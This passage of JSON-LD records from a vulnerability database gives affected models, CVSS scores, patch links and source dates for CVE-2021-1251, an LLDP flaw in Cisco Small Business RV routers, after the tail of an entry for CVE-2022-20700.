         {
            date: "2022-02-03T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
         {
            date: "2022-02-10T18:15:09.033000",
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2023-11-07T00:00:00",
            db: "VULMON",
            id: "CVE-2022-20700",
         },
         {
            date: "2023-05-11T09:08:00",
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
         {
            date: "2022-02-18T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
         {
            date: "2023-11-07T03:42:39.740000",
            db: "NVD",
            id: "CVE-2022-20700",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "plural  Cisco Small Business RV  Series router out-of-bounds write vulnerability",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2022-004940",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "buffer error",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202202-176",
         },
      ],
      trust: 0.6,
   },
}

var-202104-0377
Vulnerability from variot

Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0377",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv345",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv260w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv134w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv340",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv345p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv260p",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv340w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv132w",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv260",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.1.14",
         },
         {
            model: "rv160",
            scope: "eq",
            trust: 1,
            vendor: "cisco",
            version: "1.0.3.20",
         },
         {
            model: "rv345 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260p vpn router with poe",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv260 vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "cisco rv134w vdsl2 wireless-ac vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340 dual wan gigabit vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv160w wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "cisco rv132w adsl2+ wireless-n vpn ルータ",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv345p dual wan gigabit poe vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "rv340w dual wan gigabit wireless-ac vpn router",
            scope: null,
            trust: 0.8,
            vendor: "シスコシステムズ",
            version: null,
         },
         {
            model: "link layer discovery protocol",
            scope: null,
            trust: 0.6,
            vendor: "cisco",
            version: null,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv132w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv132w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv134w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv134w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv160w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv160w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260p_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv260w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv260w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv340w_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv340w:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.1.14:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                           {
                              cpe23Uri: "cpe:2.3:o:cisco:rv345p_firmware:1.0.3.20:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:cisco:rv345p:-:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
      ],
   },
   cve: "CVE-2021-1251",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "ADJACENT_NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 6.1,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 6.5,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Adjacent Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 6.1,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2021-1251",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.9,
                  userInteractionRequired: null,
                  vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "ADJACENT_NETWORK",
                  authentication: "NONE",
                  author: "CNVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 6.1,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 6.5,
                  id: "CNVD-2021-26111",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "MEDIUM",
                  trust: 0.6,
                  vectorString: "AV:A/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [
               {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT_NETWORK",
                  author: "NVD",
                  availabilityImpact: "HIGH",
                  baseScore: 7.4,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 2.8,
                  impactScore: 4,
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  trust: 2,
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.1",
               },
               {
                  attackComplexity: "Low",
                  attackVector: "Adjacent Network",
                  author: "NVD",
                  availabilityImpact: "High",
                  baseScore: 7.4,
                  baseSeverity: "High",
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2021-1251",
                  impactScore: null,
                  integrityImpact: "None",
                  privilegesRequired: "None",
                  scope: "Changed",
                  trust: 0.8,
                  userInteraction: "None",
                  vectorString: "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.0",
               },
            ],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2021-1251",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "ykramarz@cisco.com",
                  id: "CVE-2021-1251",
                  trust: 1,
                  value: "HIGH",
               },
               {
                  author: "CNVD",
                  id: "CNVD-2021-26111",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-202104-435",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULMON",
                  id: "CVE-2021-1251",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1251",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent)",
      sources: [
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1251",
         },
      ],
      trust: 2.25,
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2021-1251",
            trust: 3.9,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
            trust: 0.8,
         },
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
            trust: 0.6,
         },
         {
            db: "AUSCERT",
            id: "ESB-2021.1171.3",
            trust: 0.6,
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
            trust: 0.6,
         },
         {
            db: "VULMON",
            id: "CVE-2021-1251",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1251",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
   },
   id: "VAR-202104-0377",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
      ],
      trust: 1.1394850175,
   },
   iot_taxonomy: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            category: [
               "Network device",
            ],
            sub_category: null,
            trust: 0.6,
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
      ],
   },
   last_update_date: "2023-12-18T13:17:53.239000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "cisco-sa-rv-multi-lldp-u7e4chCe",
            trust: 0.8,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce",
         },
         {
            title: "Patch for Cisco Link Layer Discovery Protocol Denial of Service Vulnerability",
            trust: 0.6,
            url: "https://www.cnvd.org.cn/patchinfo/show/257011",
         },
         {
            title: "Cisco Link Layer Discovery Protocol Buffer error vulnerability fix",
            trust: 0.6,
            url: "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=147017",
         },
         {
            title: "Cisco: Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            trust: 0.1,
            url: "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts&qid=cisco-sa-rv-multi-lldp-u7e4chce",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1251",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-401",
            trust: 1,
         },
         {
            problemtype: "Buffer error (CWE-119) [ Other ]",
            trust: 0.8,
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 2.4,
            url: "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-rv-multi-lldp-u7e4chce",
         },
         {
            trust: 2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2021-1251",
         },
         {
            trust: 0.6,
            url: "https://www.auscert.org.au/bulletins/esb-2021.1171.3",
         },
         {
            trust: 0.1,
            url: "https://cwe.mitre.org/data/definitions/119.html",
         },
         {
            trust: 0.1,
            url: "https://nvd.nist.gov",
         },
      ],
      sources: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1251",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            db: "VULMON",
            id: "CVE-2021-1251",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-04-09T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            date: "2021-04-08T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1251",
         },
         {
            date: "2021-12-13T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            date: "2021-04-08T04:15:11.860000",
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            date: "2021-04-07T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2021-04-09T00:00:00",
            db: "CNVD",
            id: "CNVD-2021-26111",
         },
         {
            date: "2021-04-14T00:00:00",
            db: "VULMON",
            id: "CVE-2021-1251",
         },
         {
            date: "2021-12-13T02:45:00",
            db: "JVNDB",
            id: "JVNDB-2021-005330",
         },
         {
            date: "2023-11-07T03:27:48.083000",
            db: "NVD",
            id: "CVE-2021-1251",
         },
         {
            date: "2022-08-08T00:00:00",
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote or local",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-202104-435",
         },
      ],
      trust: 0.6,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
